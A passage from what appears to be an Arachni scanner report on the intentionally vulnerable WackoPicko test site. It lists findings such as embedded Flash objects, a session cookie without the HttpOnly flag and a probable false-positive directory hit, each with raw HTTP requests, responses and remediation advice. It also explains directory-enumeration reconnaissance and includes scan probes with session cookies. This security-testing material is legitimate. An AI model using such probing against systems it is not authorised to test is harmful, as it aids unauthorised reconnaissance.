    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  </p>
</div>


       <div class="column span-24 first last" id="footer" >
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  </body>
</html>  
   

HTML object 1 html_objects

Logs the existence of HTML object tags. Since Arachni can’t execute things like Java Applets and Flash this serves as a heads-up to the penetration tester to review the objects in question using a different method.

Signature Proof
<object.*?>.*?</object>
<OBJECT CLASSID="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
	    WIDTH="610"
	    HEIGHT="410"
	    CODEBASE="http://active.macromedia.com/flash5/cabs/swflash.cab#version=6,0,23,0">
	    <PARAM NAME="MOVIE" VALUE="/WackoPicko/action.swf?directory=%2FWackoPicko%2F">
	    <PARAM NAME="PLAY" VALUE="true">
	    <PARAM NAME="LOOP" VALUE="true">

	    <PARAM NAME="QUALITY" VALUE="high">
            <param name="FlashVars" value="name1=value1&name2=value2" />
	    <EMBED SRC="/WackoPicko/action.swf?directory=%2FWackoPicko%2F" WIDTH="510" HEIGHT="410" FlashVars="name1=value1&name2=value2"
	    PLAY="true" ALIGN="" LOOP="true" QUALITY="high"
	    TYPE="application/x-shockwave-flash"
	    PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">
	    </EMBED>
	    </OBJECT>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/home.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

username=_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec&firstname=arachni_name&lastname=arachni_name&password=5543%21%25arachni_secret&againpass=5543%21%25arachni_secret
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:51:58 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/home.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:58 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1409
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      <li class=""><a href="/WackoPicko/cart/review.php"><span>Cart</span></a></li> 	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/logout.php"><Span>Logout</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   <div class="column prepend-1 span-24 first last">
   <h2>Hello _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec, you got 100 Tradebuxs to spend!</h2>
<p>Cool stuff to do:</p>
<ul style="list-style-type:none;">
<li><a href="/WackoPicko/users/similar.php">Who's got a similar name to you?</a></li>
<li><a href="/WackoPicko/users/view.php?userid=16">Your Uploaded Pics</a></li>
<li><a href="/WackoPicko/pictures/purchased.php">Your Purchased Pics</a></li>
</ul>
<p>
  Enter in our contest: <br/>
	    <OBJECT CLASSID="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
	    WIDTH="610"
	    HEIGHT="410"
	    CODEBASE="http://active.macromedia.com/flash5/cabs/swflash.cab#version=6,0,23,0">
	    <PARAM NAME="MOVIE" VALUE="/WackoPicko/action.swf?directory=%2FWackoPicko%2F">
	    <PARAM NAME="PLAY" VALUE="true">
	    <PARAM NAME="LOOP" VALUE="true">

	    <PARAM NAME="QUALITY" VALUE="high">
            <param name="FlashVars" value="name1=value1&name2=value2" />
	    <EMBED SRC="/WackoPicko/action.swf?directory=%2FWackoPicko%2F" WIDTH="510" HEIGHT="410" FlashVars="name1=value1&name2=value2"
	    PLAY="true" ALIGN="" LOOP="true" QUALITY="high"
	    TYPE="application/x-shockwave-flash"
	    PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">
	    </EMBED>
	    </OBJECT>
	  </p>
</div>

       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/home.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

username=_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec&firstname=arachni_name&lastname=arachni_name&password=5543%21%25arachni_secret&againpass=5543%21%25arachni_secret
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:51:58 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/home.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:58 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1409
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      <li class=""><a href="/WackoPicko/cart/review.php"><span>Cart</span></a></li> 	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/logout.php"><Span>Logout</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   <div class="column prepend-1 span-24 first last">
   <h2>Hello _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec, you got 100 Tradebuxs to spend!</h2>
<p>Cool stuff to do:</p>
<ul style="list-style-type:none;">
<li><a href="/WackoPicko/users/similar.php">Who's got a similar name to you?</a></li>
<li><a href="/WackoPicko/users/view.php?userid=16">Your Uploaded Pics</a></li>
<li><a href="/WackoPicko/pictures/purchased.php">Your Purchased Pics</a></li>
</ul>
<p>
  Enter in our contest: <br/>
	    <OBJECT CLASSID="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
	    WIDTH="610"
	    HEIGHT="410"
	    CODEBASE="http://active.macromedia.com/flash5/cabs/swflash.cab#version=6,0,23,0">
	    <PARAM NAME="MOVIE" VALUE="/WackoPicko/action.swf?directory=%2FWackoPicko%2F">
	    <PARAM NAME="PLAY" VALUE="true">
	    <PARAM NAME="LOOP" VALUE="true">

	    <PARAM NAME="QUALITY" VALUE="high">
            <param name="FlashVars" value="name1=value1&name2=value2" />
	    <EMBED SRC="/WackoPicko/action.swf?directory=%2FWackoPicko%2F" WIDTH="510" HEIGHT="410" FlashVars="name1=value1&name2=value2"
	    PLAY="true" ALIGN="" LOOP="true" QUALITY="high"
	    TYPE="application/x-shockwave-flash"
	    PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">
	    </EMBED>
	    </OBJECT>
	  </p>
</div>

       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   

HttpOnly cookie 1 http_only_cookies

HTTP by itself is a stateless protocol. Therefore the server is unable to determine which requests are performed by which client, and which clients are authenticated or unauthenticated.

The use of HTTP cookies within the headers, allows a web server to identify each individual client and can therefore determine which clients hold valid authentication, from those that do not. These are known as session cookies.

When a cookie is set by the server (sent the header of an HTTP response) there are several flags that can be set to configure the properties of the cookie and how it is to be handled by the browser.

The HttpOnly flag assists in the prevention of client side-scripts (such as JavaScript) accessing and using the cookie.

This can help prevent XSS attacks targeting the cookies holding the client’s session token (setting the HttpOnly flag does not prevent, nor safeguard against XSS vulnerabilities themselves).

Remediation guidance

The initial step to remedy this would be to determine whether any client-side scripts (such as JavaScript) need to access the cookie and if not, set the HttpOnly flag.

Additionally, it should be noted that some older browsers are not compatible with the HttpOnly flag, and therefore setting this flag will not protect those clients against this form of attack.

0
PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Type In Action Default inputs Updated inputs
cookie http://192.168.0.26/WackoPicko/ http://192.168.0.26/WackoPicko/
PHPSESSID
euf2e0jqacaf66gdqmin1nb8k5
PHPSESSID
euf2e0jqacaf66gdqmin1nb8k5
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   

These issues are considered untrusted (and may in fact be false positives) because at the time they were identified the server was exhibiting some kind of anomalous behavior or there was third party interference (like network latency for example).
The listed issues need verification by a human.

Common directory 3 common_directories

Web applications are often made up of multiple files and directories.

It is possible that over time some directories may become unreferenced (unused) by the web application and forgotten about by the administrator/developer. Because web applications are built using common frameworks, they contain common directories that can be discovered (independent of server).

During the initial recon stages of an attack, cyber-criminals will attempt to locate unreferenced directories in the hope that the directory will assist in further compromise of the web application. To achieve this they will make thousands of requests using word lists containing common names. The response headers from the server will then indicate if the directory exists.

Arachni also contains a list of common directory names which it will attempt to access.

Remediation guidance

If directories are unreferenced then they should be removed from the web root and/or the application directory.

Preventing access without authentication may also be an option and can stop a client from being able to view the contents of a file, however it is still likely that the directory structure will be able to be discovered.

Using obscure directory names is implementing security through obscurity and is not a recommended option.

System components have attached some insights to this issue.


  • Meta analysis
    • This issue was logged by a discovery check but the response for the resource it identified is very similar to responses for other resources of similar type. This is a strong indication that the logged issue is a false positive.
Proof
HTTP/1.1 200 OK
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/login/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:38 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-23 first last">
    <h2>Login</h2>
        <table style="width:320px" cellspacing="0">
      <form action="/WackoPicko/users/login.php/" method="POST">
      <tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
      <tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
      <tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
   </form>
 </table>
</div>
          <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/sample.php?userid=1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:51 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 961
Content-Type: text/html



<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
